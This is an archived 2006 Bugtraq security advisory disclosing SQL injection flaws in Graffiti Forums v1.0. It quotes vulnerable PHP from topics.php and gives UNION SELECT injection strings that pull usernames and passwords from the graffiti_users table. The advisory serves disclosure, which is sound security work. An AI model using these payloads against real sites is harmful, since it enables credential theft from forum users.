lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20060708235403.12607.qmail@securityfocus.com>
Date: 8 Jul 2006 23:54:03 -0000
From: paisterist.nst@...il.com
To: bugtraq@...urityfocus.com
Subject: Graffiti Forums v1.0 SQL Injection Vulnerabilities


/*
--------------------------------------------------------
[N]eo [S]ecurity [T]eam [NST] - Advisory #24 - 08/07/06
--------------------------------------------------------
Program: Graffiti Forums
Homepage: http://www.bluedojo.com/
Vulnerable Versions: 1.0.
Risk: High!
Impact: Critical Risk

-==Graffiti Forums v1.0 SQL Injection Vulnerabilities==-
---------------------------------------------------------

- Description
---------------------------------------------------------
 This forum uses PHP, MySQL, and Java and is very easy to install. It lets people draw pictures to a graffiti "wall" instead 
of posting text messages as in traditional forums.

- Tested
---------------------------------------------------------
localhost

- Explotation
-------------------------------------------------º--------

1)

Vulnerable code:

==[ topics.php 8-11 ]==========================
[...]
$sql = "SELECT forum FROM graffiti_forums WHERE id=$f";
$result = mysql_query($sql);
$sql_row = mysql_fetch_row($result);
$forum_title = $sql_row[0];
[...]
==[ end topics.php ]==========================

How we can see there's no protection for the using of simple quotes in the sql query. Also we have to say that the script 
doesn't work with register_globals off.

In this way, we can put in the $f variable something like that 
2 UNION SELECT password as forum FROM graffiti_users

So the sql query looks like this:

SELECT forum FROM graffiti_forums WHERE id=2 UNION SELECT password as forum FROM graffiti_users
´
Here, 2 is a valid forum id. Using some ORDER BY clauses you can get differents things... check it out.


2) 
==[ topics.php 21-32 ]==========================
[...]
if (!$option){
	$sql = "SELECT id, topic FROM graffiti_topics WHERE id_forum=" . $f;
	if ($result = mysql_query($sql)){
		echo("<center><table width=400 border=1>");
		while ($sql_row = mysql_fetch_row($result)){
			echo("<tr>");
			echo("<td>");
			$id = $sql_row[0];
			$topic = $sql_row[1];
			echo("<font face='Arial' size=3>");
			echo("<img src='./graphics/paper.gif' border=0> &nbsp;<a href='messages.php?t=$id&f=$f'>$topic</a>");
			echo("</font>");
[...]
==[ end topics.php ]==========================

In the SQL query of this code we can see the same bug. The explotation is very similar that the other:

topics.php?f=2 UNION SELECT password as topic, username as id FROM graffiti_users

The final sql query looks like this:

SELECT forum FROM graffiti_forums WHERE id=2 UNION SELECT password as topic, username as id FROM graffiti_users

Here, 2 is a valid forum id. Another time you can play with some ORDER BY or GROUP BY clauses.


Practically all the sql querys of this script are vulnerable to SQL Injections, so i'm not going to keep searching bugs on a 
bugs cave.

Attention: the magic_quotes_gpc php flag has to be off (no filtering for slashes, simple quotes and double quotes). Also 
remember that the script doesn't work without register_globals Off.


- How to fix it? More information?
--------------------------------------------------------
Visit our forum to know how to fix it or to get more information.
http://www.neosecurityteam.net/foro/

- References
--------------------------------------------------------
http://www.neosecurityteam.net/index.php?action=advisories&id=24

- Credits
--------------------------------------------------------
Discovered by Paisterist -> paisterist.nst [at] gmail [dot] com

[N]eo [S]ecurity [T]eam [NST] - http://www.neosecurityteam.net/


- Greets
--------------------------------------------------------
HaCkZaTaN
K4P0
Daemon21
Link
0m3gA_x
LINUX
m0rpheus

Argentina, Colombia, Chile, Bolivia, Uruguay EXISTS!!

@@@@'''@@@@'@@@@@@@@@'@@@@@@@@@@@
'@@@@@''@@'@@@''''''''@@''@@@''@@
'@@'@@@@@@''@@@@@@ @@@'''''@@@
'@@'''@@@@'''''''''@@@''''@@@
@@@@''''@@'@@@@@@@@@@''''@@@@@

/* EOF */


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ